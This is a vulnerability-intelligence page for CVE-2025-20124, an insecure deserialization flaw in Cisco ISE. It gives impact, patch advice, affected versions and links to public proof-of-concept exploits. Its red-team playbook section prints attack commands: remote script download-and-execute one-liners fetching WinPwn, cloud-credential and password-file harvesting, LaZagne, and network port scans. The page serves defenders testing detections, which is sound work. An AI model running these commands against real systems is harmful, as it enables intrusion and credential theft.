CVE-2025-20124
Overview
This vulnerability is an insecure deserialization flaw in Cisco Identity Services Engine (ISE) software, specifically within an API that processes user-supplied Java byte streams. The root cause is the unsafe handling of serialized Java objects, allowing malicious input to be deserialized without proper validation. The affected component is the API endpoint responsible for processing these serialized objects within Cisco ISE versions including 3.1.0 and its patch releases.
Vulnerability Description
A vulnerability in an API of Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands as the root user on an affected device. This vulnerability is due to insecure deserialization of user-supplied Java byte streams by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object to an affected API. A successful exploit could allow the attacker to execute arbitrary commands on the device and elevate privileges. Note: To successfully exploit this vulnerability, the attacker must have valid read-only administrative credentials. In a single-node deployment, new devices will not be able to authenticate during the reload time.
Impact
An authenticated attacker with read-only administrative credentials can exploit this vulnerability to execute arbitrary commands as the root user on the affected Cisco ISE device. This enables full system compromise, including privilege escalation and potential disruption of authentication services, notably affecting device authentication during reload in single-node deployments. The attack requires network access and valid credentials (CVSS vector AV:N/AC:L/PR:L/UI:N), making it a critical risk for internal threat actors or compromised accounts.
Solution
Cisco has released security updates addressing this vulnerability in Cisco Identity Services Engine Software versions 3.1.0 and subsequent patch releases. Administrators should apply the patches referenced in the Cisco Security Advisory (cisco-sa-ise-multivuls-FTW9AOXF) available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-multivuls-FTW9AOXF. Following the vendor instructions for upgrading to the fixed versions or applying recommended patches is essential to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the API of Cisco Identity Services Engine (ISE) arises from the insecure deserialization of user-supplied Java byte streams. This flaw allows an authenticated remote attacker to craft and send a specially designed serialized Java object to the affected API. Upon successful exploitation, the attacker can execute arbitrary commands as the root user on the device, thereby gaining elevated privileges. This vulnerability is particularly concerning as it requires only read-only administrative credentials for exploitation, making it accessible to individuals who may already have limited access to the system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with valid credentials could leverage the API to send malicious payloads, leading to unauthorized command execution. The risk is amplified in environments where multiple devices rely on the same ISE for authentication and authorization, as a successful attack could disrupt service for new devices attempting to authenticate during reload times. Scenarios could include an attacker manipulating device configurations, extracting sensitive information, or even deploying malware, all of which could have severe implications for network integrity and security.
The real-world impact of this vulnerability on businesses can be significant. Organizations that rely on Cisco ISE for network access control and identity management may face operational disruptions, data breaches, and compliance violations. The ability to execute arbitrary commands as a root user could lead to unauthorized access to sensitive data, potentially resulting in financial loss, reputational damage, and legal repercussions. Furthermore, the exploitation of this vulnerability could facilitate lateral movement within the network, allowing attackers to compromise additional systems and escalate their privileges further.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Cisco ISE to the latest patches is critical, as these updates often contain fixes for known vulnerabilities. Additionally, organizations should employ robust monitoring solutions to detect unusual API activity, such as unexpected command executions or unauthorized access attempts. Implementing strict access controls and adhering to the principle of least privilege can further reduce the risk of exploitation. Conducting regular security assessments and penetration testing can also help identify potential weaknesses before they can be exploited by malicious actors.
In conclusion, the vulnerability within the Cisco Identity Services Engine API poses a serious threat to organizations that utilize this technology for managing network access. The combination of insecure deserialization and the requirement for only read-only administrative credentials creates a pathway for attackers to gain significant control over affected devices. By understanding the technical details, potential attack vectors, and real-world implications, organizations can take proactive measures to safeguard their systems and mitigate the associated risks.
CSURFACE threat intelligence has detected a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-20124, reflecting a growing likelihood of exploitation in the wild. This uptick aligns with the emergence of additional proof-of-concept exploits circulating on public repositories, which have garnered increased attention from both security researchers and malicious actors. Our telemetry indicates that while exploitation attempts remain relatively stable over the past week, the availability of these new tools lowers the barrier to entry for threat actors seeking to leverage the insecure deserialization flaw in Cisco Identity Services Engine APIs. This development is significant because it suggests a heightened risk of opportunistic attacks, particularly in environments where administrative credentials may be compromised or insufficiently protected. Consequently, the threat level associated with this vulnerability has escalated from a theoretical concern to a more imminent operational risk, warranting increased vigilance from defenders monitoring Cisco ISE deployments.
Affected Products (22)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Identity Services Engine | All |
cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:-:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch1:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch2:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch3:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch4:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch5:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch6:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch7:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch8:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.1.0 |
cpe:2.3:a:cisco:identity_services_engine:3.1.0:patch9:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.2.0 |
cpe:2.3:a:cisco:identity_services_engine:3.2.0:-:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.2.0 |
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch1:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.2.0 |
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch2:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.2.0 |
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch3:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.2.0 |
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch4:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.2.0 |
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch5:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.2.0 |
cpe:2.3:a:cisco:identity_services_engine:3.2.0:patch6:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.3.0 |
cpe:2.3:a:cisco:identity_services_engine:3.3.0:-:*:*:*:*:*:*
|
|
|
Cisco | Identity Services Engine | 3.3.0 |
cpe:2.3:a:cisco:identity_services_engine:3.3.0:patch1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Cisco ISE 3.0 - Remote Code Execution (RCE) | İbrahimsql | remote | multiple | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Yuri08loveElaina/CVE-2025-20124_and_CVE-2025-20125
A vulnerability in an API of Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands as th...
|
Yuri08loveElaina | 3 | 0 | 2025-06-16 | View |
|
ftz7/Cisco-ISE-3.0---Remote-Code-Execution-RCE-
Esse script explora a vulnerabilidade CVE-2025-20124 — uma falha de Java Deserialization no Cisco ISE (Identity Services...
|
ftz7 | 1 | 1 | 2025-08-12 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
60%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-20124 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-multivuls-FTW9AOXF |